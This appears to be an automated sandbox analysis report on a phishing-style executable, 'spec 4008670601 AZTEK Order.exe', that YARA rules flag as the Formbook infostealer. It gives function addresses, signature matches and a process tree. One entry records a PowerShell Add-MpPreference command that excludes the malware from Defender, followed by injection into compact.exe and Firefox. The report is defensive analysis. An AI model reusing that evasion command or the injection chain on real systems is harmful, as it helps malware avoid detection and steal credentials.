            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185DAC66_2_0185DAC6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01867A466_2_01867A46
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FA496_2_0186FA49
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F5AA06_2_017F5AA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01823A6C6_2_01823A6C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B3D406_2_017B3D40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CFDC06_2_017CFDC0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01861D5A6_2_01861D5A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01867D736_2_01867D73
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FCF26_2_0186FCF2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01829C326_2_01829C32
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FFB16_2_0186FFB1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FF096_2_0186FF09
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B1F926_2_017B1F92
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B9EB06_2_017B9EB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CA35212_2_037CA352
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371E3F012_2_0371E3F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D03E612_2_037D03E6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B027412_2_037B0274
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037902C012_2_037902C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0379815812_2_03798158
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037AA11812_2_037AA118
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370010012_2_03700100
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C81CC12_2_037C81CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D01AA12_2_037D01AA
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C41A212_2_037C41A2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037A200012_2_037A2000
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371077012_2_03710770
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0373475012_2_03734750
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370C7C012_2_0370C7C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372C6E012_2_0372C6E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371053512_2_03710535
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D059112_2_037D0591
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C244612_2_037C2446
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B442012_2_037B4420
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037BE4F612_2_037BE4F6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CAB4012_2_037CAB40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C6BD712_2_037C6BD7
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370EA8012_2_0370EA80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372696212_2_03726962
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037129A012_2_037129A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037DA9A612_2_037DA9A6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371A84012_2_0371A840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371284012_2_03712840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0373E8F012_2_0373E8F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036F68B812_2_036F68B8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03784F4012_2_03784F40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03730F3012_2_03730F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B2F3012_2_037B2F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03752F2812_2_03752F28
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371CFE012_2_0371CFE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03702FC812_2_03702FC8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0378EFA012_2_0378EFA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03710E5912_2_03710E59
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CEE2612_2_037CEE26
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CEEDB12_2_037CEEDB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03722E9012_2_03722E90
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CCE9312_2_037CCE93
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037ACD1F12_2_037ACD1F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371AD0012_2_0371AD00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370ADE012_2_0370ADE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03728DBF12_2_03728DBF
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03710C0012_2_03710C00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03700CF212_2_03700CF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B0CB512_2_037B0CB5
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036FD34C12_2_036FD34C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C132D12_2_037C132D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0375739A12_2_0375739A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B12ED12_2_037B12ED
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372B2C012_2_0372B2C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037152A012_2_037152A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037DB16B12_2_037DB16B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0374516C12_2_0374516C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036FF17212_2_036FF172
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371B1B012_2_0371B1B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C70E912_2_037C70E9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CF0E012_2_037CF0E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037170C012_2_037170C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037BF0CC12_2_037BF0CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CF7B012_2_037CF7B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0375563012_2_03755630
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C16CC12_2_037C16CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C757112_2_037C7571
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D95C312_2_037D95C3
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037AD5B012_2_037AD5B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370146012_2_03701460
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CF43F12_2_037CF43F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFB7612_2_037CFB76
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03785BF012_2_03785BF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0374DBF912_2_0374DBF9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372FB8012_2_0372FB80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03783A6C12_2_03783A6C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFA4912_2_037CFA49
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C7A4612_2_037C7A46
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037BDAC612_2_037BDAC6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03755AA012_2_03755AA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037ADAAC12_2_037ADAAC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B1AA312_2_037B1AA3
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371995012_2_03719950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372B95012_2_0372B950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037A591012_2_037A5910
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0377D80012_2_0377D800
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037138E012_2_037138E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFF0912_2_037CFF09
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D3FD512_2_036D3FD5
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D3FD212_2_036D3FD2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFFB112_2_037CFFB1
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03711F9212_2_03711F92
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03719EB012_2_03719EB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C7D7312_2_037C7D73
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C1D5A12_2_037C1D5A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03713D4012_2_03713D40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372FDC012_2_0372FDC0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03789C3212_2_03789C32
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFCF212_2_037CFCF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD1C8012_2_02DD1C80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DEA71012_2_02DEA710
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCCE7012_2_02DCCE70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCCE6712_2_02DCCE67
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCB2EB12_2_02DCB2EB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCD09012_2_02DCD090
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCB11012_2_02DCB110
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD37C012_2_02DD37C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD37BE12_2_02DD37BE
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2A27512_2_03A2A275
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2B01812_2_03A2B018
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BAF412_2_03A2BAF4
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BFAD12_2_03A2BFAD
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BD7B12_2_03A2BD7B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BC1512_2_03A2BC15
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03757E54 appears 111 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0377EA12 appears 86 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0378F290 appears 105 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 036FB970 appears 280 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03745130 appears 58 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 0179B970 appears 280 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 017E5130 appears 58 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 0182F290 appears 105 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 017F7E54 appears 103 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 0181EA12 appears 86 times
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2131268068.0000000006EB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2114773908.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002861000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000000.2096605729.0000000000560000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameQgGC.exe> vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2138549827.000000000D100000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001258000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.000000000189D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe Binary or memory string: OriginalFilenameQgGC.exe> vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: spec 4008670601 AZTEK Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: _0020.SetAccessControl
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: _0020.AddAccessRule
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: _0020.SetAccessControl
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: _0020.AddAccessRule
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LhKXYDnDrCC31IYC1l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LhKXYDnDrCC31IYC1l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LhKXYDnDrCC31IYC1l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: _0020.SetAccessControl
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs Security API names: _0020.AddAccessRule
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: A;.VBP
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/7@14/13
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spec 4008670601 AZTEK Order.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvfivwcf.jud.ps1
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: spec 4008670601 AZTEK Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: compact.exe, 0000000C.00000002.4556356627.0000000003188000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2707353193.0000000003188000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4556356627.00000000031B7000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2707239965.0000000003168000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2714067161.0000000003193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: spec 4008670601 AZTEK Order.exeReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: netutils.dll
